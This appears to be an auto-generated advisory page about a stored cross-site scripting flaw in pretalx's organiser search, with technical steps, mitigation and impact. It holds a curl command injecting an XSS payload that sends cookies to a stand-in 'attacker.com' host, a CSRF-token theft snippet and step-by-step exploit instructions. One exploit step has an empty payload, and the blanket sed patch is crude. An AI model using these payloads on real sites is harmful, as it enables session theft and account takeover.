Pretalx, Stored Cross-Site Scripting (XSS), CVE not provided in (Medium)

Listen to this Post

How the mentioned CVE works (technical details):

  1. The pretalx backend organiser search uses `innerHTML` string interpolation to render submission s, speaker display names, and user names/emails into the result dropdown.
  2. Any registered user can control their display name or submission – fields that are indexed by the organiser search.
  3. An attacker injects malicious HTML/JavaScript into one of these fields (e.g., <img src=x onerror=fetch('/admin/csrf-token')>).
  4. When an organiser or superuser performs a typeahead search, the backend returns the malicious record because the attacker includes common substrings.
  5. The frontend JavaScript (in src/pretalx/static/orga/js/base.js) concatenates the unsanitised record into the DOM via innerHTML, not textContent.
  6. The injected script executes in the organiser’s browser context, with full access to the organiser’s session and CSRF token.
  7. The attacker can then read the page’s CSRF token by querying `document.querySelector(‘[name=csrfmiddlewaretoken]’)` or similar.
  8. With the CSRF token, the attacker can forge authenticated requests (e.g., POST /orga/event/submissions/123/delete) on behalf of the victim.
  9. Exfiltration of sensitive data (e.g., other submissions, speaker emails, organiser notes) is possible via `fetch` to an attacker-controlled server.
  10. The vulnerability requires no special privilege – any user with a speaker or submitter role can exploit it.
  11. Superusers are also at risk because the search includes all usernames/emails, not just event participants.
  12. The issue is triggered only when the organiser’s search query matches the malicious record – easily achieved by placing common words like “a” or “the” in the payload.
  13. No output encoding or sanitisation is applied before injecting into the dropdown.
  14. The vulnerable code path exists in the static asset base.js, which is loaded on every organiser search page.
  15. The patch replaces `innerHTML` with safe DOM methods (e.g., `textContent` or createTextNode) and escapes user-controlled data.
  16. Fixed in pretalx version 2026.1.0 by updating the JavaScript and re-collecting static files.
  17. No configuration-level workaround exists; operators must patch manually or avoid using the search bar.
  18. The vulnerability was reported by Elad Meged from Novee Security.

dailycve form:

Platform: pretalx
Version: <2026.1.0
Vulnerability: Stored XSS
Severity: Medium
date: 2026-04-18

Prediction: 2026-04-25

What Undercode Say:

Simulate search payload injection via speaker display name
curl -X POST https://pretalx.example.com/orga/event/demo/submit/ \
-d "speaker_name=<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>" \
-H "Cookie: sessionid=attacker_session"
Extract CSRF token from organiser page (exploit snippet)
csrf_token = document.querySelector('[name=csrfmiddlewaretoken]').value;
fetch('/orga/api/submissions/1/delete/', {method:'POST', headers:{'X-CSRFToken': csrf_token}});
Patch application (manual workaround)
sed -i 's/innerHTML/textContent/g' src/pretalx/static/orga/js/base.js
python manage.py collectstatic --noinput

Exploit:

  1. Register as a user on the pretalx instance.
  2. Submit a proposal or change display name to: ``
    3. Wait for organiser to search for a common substring present in your payload (e.g., “a”).
  3. Script executes in organiser’s browser, stealing CSRF token and session cookies.
  4. Use stolen token to perform any action the organiser can (e.g., approve submissions, delete events, change user roles).

Protection from this CVE:

  • Upgrade to pretalx v2026.1.0 immediately.
  • If unable to upgrade, manually patch `src/pretalx/static/orga/js/base.js` – replace all `innerHTML` assignments that handle user data with `textContent` or innerText.
  • Run `python manage.py collectstatic` after patching.
  • Avoid using the organiser search bar until patched.
  • Implement Content Security Policy (CSP) to block inline scripts and restrict `fetch` to trusted origins.

Impact:

  • Full account takeover of organiser and superuser accounts.
  • Unauthorised modification of conference data (submissions, schedules, speaker info).
  • Data exfiltration including all submitted proposals, user emails, and internal notes.
  • Privilege escalation: attacker can grant themselves admin rights via CSRF.
  • Reputation damage and potential leakage of confidential review discussions.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top